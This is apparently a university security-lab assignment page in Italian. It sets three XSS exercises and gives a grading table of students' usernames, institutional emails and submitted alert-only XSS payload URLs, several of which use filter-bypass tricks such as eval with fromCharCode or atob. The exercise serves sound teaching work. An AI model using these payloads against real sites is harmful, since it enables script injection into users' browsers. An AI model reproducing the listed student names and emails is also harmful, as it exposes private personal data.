Lo studente deve completare i seguenti livelli di XSS injection:
É necessario trovare all'interno della pagina la vulnerabilitá XSS, individiare il parametro e riuscire (tramite il parametro) ad ottenere un alert javascript.
Una volta completato ogni livello é necessario creare un post privato contenente il payload XSS, rispettivamente i post dovranno avere nel nome la stringa: "ex4_1" per la soluzione del primo esercizio, "ex4_2" per il secondo ed "ex4_3" per il terzo. Il contenuto del post dovrá essere base64 encoded.
Es: se il payload é: <script>alert(1);</script>
 allora il contenuto del post dovrá essere PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4K (ovvero base64("<script>alert(1);</script>
"))
Attenzione: il sistema di consegna verifica in automatico la consegne avvenute entro la data aprendo una finistra di chrome con URL: https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss= e giustapponendo base64_decode(contenuto_del_post_con_nome_ex4_2)
Supponendo che il contenuto del post (payload) sia: <script>alert(1);</script>
 viene visitata la pagina:
https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<script>alert(1);</script>
 e controllato se questa lancia un popup di tipo alert.
Aggiornato 9/7/2024 ore 17:20
pass | username | title | url | error | |
---|---|---|---|---|---|
✅ | crlttdnt | ex4_1 | carlotta.donato@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1);"%27 | |
✅ | lucrezia_maggiulli | ex4_1 | lucrezia.maggiulli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";%20alert("Error");// | |
✅ | marti | ex4_1 | martina.balasini@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b="; alert(1); // | |
✅ | FilippoCorti | ex4_1 | filippo.corti1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1);v="` | |
✅ | FilippoCorti | ex4_3 | filippo.corti1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(String.fromCharCode(97,108,101,114,116))(1) | |
✅ | Laura | ex4_1 | laura.patinocanahuire@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1);// | |
✅ | David | ex4_1 | david.pizzolato1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=b=";alert(1);d=" | |
✅ | marcotrava | ex4_1 | marco.travaglianti@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("marcotrava_ex4_1");" | |
✅ | marcotrava | ex4_2 | marco.travaglianti@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg onload=alert("marcotrava_ex4_2")> | |
✅ | Filippo | ex4_1 | filippo.moscatelli1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert("1");// | |
✅ | marcotrava | ex4_3 | marco.travaglianti@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;alert(`marcotrava_ex4_3`); | |
✅ | PizzoSosa | ex4_1 | niccolo.pizzocri@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("PizzoSosa_ex4_1");" | |
✅ | PizzoSosa | ex4_2 | niccolo.pizzocri@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg%20onload=alert("PizzoSosa_ex_4_2")> | |
✅ | PizzoSosa | ex4_3 | niccolo.pizzocri@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;alert(`PizzoSosa_ex4_3`); | |
✅ | cristianrossato | ex4_1 - Crilin | cristian.rossato@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=?b=";alert("Crilin");" | |
✅ | andrealosito | ex4_1 | andrea.losito@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("andrealosito");" | |
✅ | andrealosito | ex4_3 | andrea.losito@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;alert(`andrealosito`); | |
✅ | giobon | ex4_1 | giovanni.bongiorno@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("giobon");" | |
✅ | filippocaviola | ex4_1 | filippo.caviola@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=%22;alert(%22filippocaviola%22);%22 | |
✅ | giobon | ex4_3 | giovanni.bongiorno@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;alert(`giobon%20ex4`); | |
✅ | filippocaviola | ex4_2 | filippo.caviola@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=%3C?%3E%3Csvg%20onload=alert(%22filippocaviola%22)%3E | |
✅ | filippocaviola | ex4_3 | filippo.caviola@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;alert(`heihei`); | |
✅ | Cristian | ex4_1 | cristian.dicillo@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("Cristian%20Di%20Cillo");" | |
✅ | TuxAlex | ex4_1 | alessandro.virgilio1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert(1);// | |
✅ | Cristian | ex4_3 | cristian.dicillo@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;alert(`Cristian`); | |
✅ | LorenzoGalbiati | ex4_1 | lorenzo.galbiati1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(Error);// | |
✅ | nicola_razvan_danciu | ex4_1 | nicolarazvan.danciu@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert(1);// | |
✅ | Alessia | ex4_1 | alessia.ferrari18@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("es1");// | |
✅ | ValeBotti | ex4_1 | valentina.botti@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b="-alert(1)-" | |
✅ | ValeBotti | ex4_2 | valentina.botti@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<??><img%20src=err.jpg%20onerror=alert(1)> | |
✅ | Laura | ex4_2 | laura.patinocanahuire@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><img src=x onerror=alert(1)> | |
✅ | Laura | ex4_3 | laura.patinocanahuire@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(new%20URL(location).searchParams.get(1))&1=alert(1) | |
✅ | Lauri | ex4_1 | laura.andaloro2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("Laura%20Andaloro");" | |
✅ | Lauri | ex4_2 | laura.andaloro2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg%20onload=alert("LauraAndaloro")> | |
✅ | Lauri | ex4_3 | laura.andaloro2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(140901); | |
✅ | crlttdnt | ex4_3 | carlotta.donato@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(String.fromCharCode(97,108,101,114,116))(1) | |
✅ | ValeBotti | ex4_3 | valentina.botti@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(new%20URL(location).searchParams.get(1))&1=alert(1) | |
✅ | ginevraoldani | ex4_1 | ginevra.oldani@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("GinevraOldani");" | |
✅ | ginevraoldani | ex4_2 | ginevra.oldani@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg%20onload=alert("GinevraOldani")> | |
✅ | ginevraoldani | ex4_3 | ginevra.oldani@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(200104); | |
✅ | SaraMauriello | ex4_1 | sara.mauriello@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("SaraMauriello");" | |
✅ | SaraMauriello | ex4_2 | sara.mauriello@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg%20onload=alert("SaraMauriello")> | |
✅ | SaraMauriello | ex4_3 | sara.mauriello@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(120304); | |
✅ | lucaa | ex4_1 | luca.alessi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("alert lucaa ex4_1");" | |
✅ | lucaa | ex4_2 | luca.alessi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg onload=alert("ex4_2")> | |
✅ | lucaa | ex4_3 | luca.alessi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;alert(`alert lucaa ex4_3`); | |
✅ | giuseppebagnara | ex4_1 | giuseppe.bagnara@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert("GiuseppeBagnara");" | |
✅ | giuseppebagnara | ex4_2 | giuseppe.bagnara@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><svg onload=alert("GiuseppeBagnara")> | |
✅ | giuseppebagnara | ex4_3 | giuseppe.bagnara@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(171202); | |
✅ | FilippoCorti | ex4_2 | filippo.corti1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><img%20src=x%20onerror=alert(1)> | |
✅ | sabuz | Ex4_1 | sara.buzzi2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=b=";alert(1);x=" | |
✅ | sabuz | Ex4_2 | sara.buzzi2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=xss=<?><img%20src=x%20onerror=alert(1)> | |
✅ | sabuz | Ex4_3 | sara.buzzi2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=xss=eval(String.fromCharCode(97,108,101,114,116))(1) | |
✅ | luciasangalli_ | ex4_1 | lucia.sangalli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("LuciaSangalli");" | |
✅ | luciasangalli_ | ex4_2 | lucia.sangalli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg%20onload=alert("LuciaSangalli")> | |
✅ | luciasangalli_ | ex4_3 | lucia.sangalli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(181203); | |
✅ | enricodallastella | ex4_1 | enrico.dallastella@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("risolto");" | |
✅ | marti | ex4_2 | martina.balasini@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?echo(><img src="x" onerror=alert()>)?> | |
✅ | enricodallastella | ex4_2 | enrico.dallastella@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg onload=alert("risolto")> | |
✅ | enricodallastella | ex4_3 | enrico.dallastella@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;alert(`risolto`); | |
✅ | yash | ex4_1 | yash.kumar@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("LauraAndaloro");" | |
✅ | MatteoBertoletti | ex4_1 | matteo.bertoletti1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert("MatteoBertoletti");" | |
✅ | MatteoBertoletti | ex4_2 | matteo.bertoletti1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><svg onload=alert("MatteoBertoletti")> | |
✅ | yash | ex4_2 | yash.kumar@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg 20onload=alert("YashKumar")> | |
✅ | MatteoBertoletti | ex4_3 | matteo.bertoletti1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(150702); | |
✅ | yash | ex4_3 | yash.kumar@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(010402); | |
✅ | cecilia-mene | ex4_1 | cecilia.mene@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("CeciliaMene");" | |
✅ | cecilia-mene | ex4_2 | cecilia.mene@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg%20onload=alert("CeciliaMene")> | |
✅ | cecilia-mene | ex4_3 | cecilia.mene@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(130602); | |
✅ | bonoframe | ex4_1 | alessio.bono@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert("AlessioBono");" | |
✅ | bonoframe | ex4_2 | alessio.bono@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><svg onload=alert("AlessioBono")> | |
✅ | bonoframe | ex4_3 | alessio.bono@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(121102); | |
✅ | giods | ex4_1 | giorgio.dalsanto@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert('XSS');" | |
✅ | giods | ex4_2 | giorgio.dalsanto@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><img src=x onerror=alert('XSS')> | |
✅ | giods | ex4_3 | giorgio.dalsanto@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(String.fromCharCode(97,108,101,114,116))(1) | |
✅ | federico.cigada | ex4_1 | federico.cigada1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1);// | |
✅ | federico.cigada | ex4_2 | federico.cigada1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><img%20src=1%20onerror=alert(1)> | |
✅ | federico.cigada | ex4_3 | federico.cigada1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(38));alert(1); | |
✅ | David | ex4_2 | david.pizzolato1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=xss=<?><svg onload=alert(1)> | |
✅ | David | ex4_3 | david.pizzolato1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=xss=eval(String.fromCharCode(97,108,101,114,116))(1) | |
✅ | matteo.ferrario4 | ex4_1 | matteo.ferrario4@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=Matteo"; alert(1); d="Ciao | |
✅ | matteo.ferrario4 | ex4_2 | matteo.ferrario4@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=ciao<?<uselesstag><img%20src="x"%20onerror="alert(1)"> | |
✅ | matteo.ferrario4 | ex4_3 | matteo.ferrario4@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(String.fromCharCode(97,108,101,114,116))%281%29; | |
✅ | cristianrossato | ex4_2 - Crilin | cristian.rossato@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=%3C?%3E%3Csvg%20onload=alert(%22Crilin%22)%3E | |
✅ | cristianrossato | ex4_3 - Crilin | cristian.rossato@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=%3C?%3E%3Csvg%20onload=alert(%22Crilin%22)%3E | |
✅ | thomasbaio | ex4_1 | thomas.baiocchi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=</script><script src="https://socialnetwork.laser.di.unimi.it/cache/1716153318/default/jquery.js"></script><script src="https://socialnetwork.laser.di.unimi.it/cache/1716153318/default/jquery-ui.js"></script><script src="https://socialnetwork.laser.di.unimi.it/cache/1716153318/default/elgg/require_config.js"></script><script src="https://socialnetwork.laser.di.unimi.it/cache/1716153318/default/require.js"></script><script src="https://socialnetwork.laser.di.unimi.it/cache/1716153318/default/elgg.js"></script><script> | |
❗️ | thomasbaio | Ex4_2 | thomas.baiocchi@studenti.unimi.it | Incorrect padding | |
❗️ | thomasbaio | Ex4_3 | thomas.baiocchi@studenti.unimi.it | Incorrect padding | |
✅ | crlttdnt | ex4_2 | carlotta.donato@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><img%20src=x%20onerror=alert(1)> | |
✅ | marti | ex4_3 | martina.balasini@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(atob(location.hash.slice(1)))#YWxlcnQoMSk= | |
✅ | simone.cicero | ex4_1 | simone.cicero@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("Simone cicero ha fatto un alert");" | |
✅ | AlessandroRota | ex4_1 | alessandro.rota6@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("Rota%20Alessandro%20Prima%20Injection");" | |
✅ | AlessandroRota | ex4_2 | alessandro.rota6@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg%20onload=alert("RotaAlessandroSecondaInjection")> | |
✅ | simone.cicero | ex4_2 | simone.cicero@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg%20onload=alert("Simonecicerohafattounalert")> | |
✅ | AlessandroRota | ex4_3 | alessandro.rota6@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(33333333); | |
✅ | simone.cicero | ex4_3 | simone.cicero@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(111111); | |
✅ | LeoPizzi | ex4_1 | leonardo.pizzini@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("LeonardoPizzini");" | |
✅ | LeoPizzi | ex4_2 | leonardo.pizzini@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg%20onload=alert("LeonardoPizzini")> | |
✅ | LeoPizzi | ex4_3 | leonardo.pizzini@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(170303); | |
✅ | ngozi_a | ex4_1 | ngozipeace.aigbe@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=".replace("Hey",%20alert())// | |
✅ | Matteo | ex4_1 | matteo.rota9@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1);// | |
✅ | Matteo | ex4_2 | matteo.rota9@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?php><svg%20onload=alert(2)> | |
✅ | manueldilenaz8na | ex4_1 Manuel dilena | manuel.dilena@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=%22;alert(%22manuel_dilena_ex4_1%22);%22 | |
✅ | manueldilenaz8na | ex4_2 Dilena Manuel | manuel.dilena@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=%3C?%3E%3Csvg%20onload=alert(%22manuel_dilena_ex4%22)%3E | |
✅ | GABRI56 | ex4_1 | gabriele.rossi8@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?m}'';alert(''1'');'' | |
✅ | manueldilenaz8na | ex4_3 dilena manuel | manuel.dilena@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;alert(`manuel%20dilena%20ex4_3`); | |
✅ | ngozi_a | ex4_2 | ngozipeace.aigbe@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?php?><img src=g onerror=alert()> | |
✅ | GABRI56 | ex4_2 | gabriele.rossi8@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><img src=x onerror=alert(1)> | |
✅ | GABRI56 | ex4_3 | gabriele.rossi8@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substyh55));;;;;;;;;;;;;;;;;alert(''3''); | |
✅ | marcochiesaaa | ex4_1 | marco.chiesa2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b='';alert(''1'');'' | |
✅ | marcochiesaaa | ex4_2 | marco.chiesa2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg onload=alert(''2'')> | |
✅ | marcochiesaaa | ex4_2 | marco.chiesa2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg onload=alert(''2'')> | |
✅ | marcochiesaaa | ex4_3 | marco.chiesa2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;alert(''3''); | |
✅ | ngozi_a | ex4_3 | ngozipeace.aigbe@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(prompt()) | |
✅ | Alessio27 | ex4_2 | alessio.mandaglio@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><svg onload=alert("XSS")> | |
✅ | Alessio27 | ex4_1 | alessio.mandaglio@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b="-alert('XSS')-" | |
✅ | riccardoalliegro | ex4_1 | riccardo.alliegro@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=%22;alert(%22RiccardoAlliegro%22);%22 | |
✅ | riccardoalliegro | ex4_2 | riccardo.alliegro@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=%3C?%3E%3Csvg%20onload=alert(%22RiccardoAlliegro%22)%3E | |
✅ | riccardoalliegro | ex4_3 | riccardo.alliegro@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(190795); | |
✅ | LorenzoGalbiati | ex4_3 | lorenzo.galbiati1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(atob(location.hash.slice(1)))#YWxlcnQoMSk | |
✅ | LorenzoGalbiati | ex4_2 | lorenzo.galbiati1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=alert("XSS")<_SCRIPT>')_ ?> | |
✅ | TuxAlex | ex4_2 | alessandro.virgilio1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?echo (><img src=/ onerror=alert(1)>?> | |
✅ | giu_agoz | ex4_1 | giulia.agozzino@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert(1)// | |
✅ | lucrezia_maggiulli | ex4_2 | lucrezia.maggiulli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?echo(><img src="x" onerror=alert()>?> | |
✅ | lucrezia_maggiulli | ex4_3 | lucrezia.maggiulli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(atob(location.hash.slice(1)))#YWxlcnQoMSk= | |
✅ | FraPerti02 | ex4_1 | francesco.pertile@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert('livello_1');//" | |
✅ | FraPerti02 | ex4_2 | francesco.pertile@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?echo(><img%20src="x"%20onerror=alert('livello_2')>?> | |
✅ | FraPerti02 | ex4_3 | francesco.pertile@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(atob(location.hash.slice(1)))#YWxlcnQoJ2xpdmVsbG9fMycp | |
✅ | matteolombardo | ex4_1 Contenuto | matteo.lombardo2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("matteo.lombardo2@studenti.unimi.it");" | |
✅ | matteolombardo | ex4_2 Contenuto | matteo.lombardo2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg onload=alert(abc)> | |
✅ | matteolombardo | ex4_3 Contenuto | matteo.lombardo2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;alert(ciao) | |
✅ | francescabelso | ex4_1 | francesca.belso@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=%22;alert(%22FrancescaBelso%22);%22 | |
✅ | francescabelso | ex4_2 | francesca.belso@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=%3C?%3E%3Csvg%20onload=alert(%22FrancescaBelso%22)%3E | |
✅ | francescabelso | ex4_3 | francesca.belso@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(111201) | |
✅ | samueledesantis | ex4_1 | samuelepietro.desantis@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert('livello1');//" | |
✅ | samueledesantis | ex4_2 | samuelepietro.desantis@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?echo(><img%20src="x"%20onerror=alert('livello_2')>?> | |
✅ | samueledesantis | ex4_3 | samuelepietro.desantis@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(atob(location.hash.slice(1)))#YWxlcnQoJ2xpdmVsbG9fMycp | |
✅ | Grei | ex4_1 | greis.sava@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert('XSS');//" | |
✅ | Grei | ex4_2 | greis.sava@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg onload=alert("nome_cognome")> | |
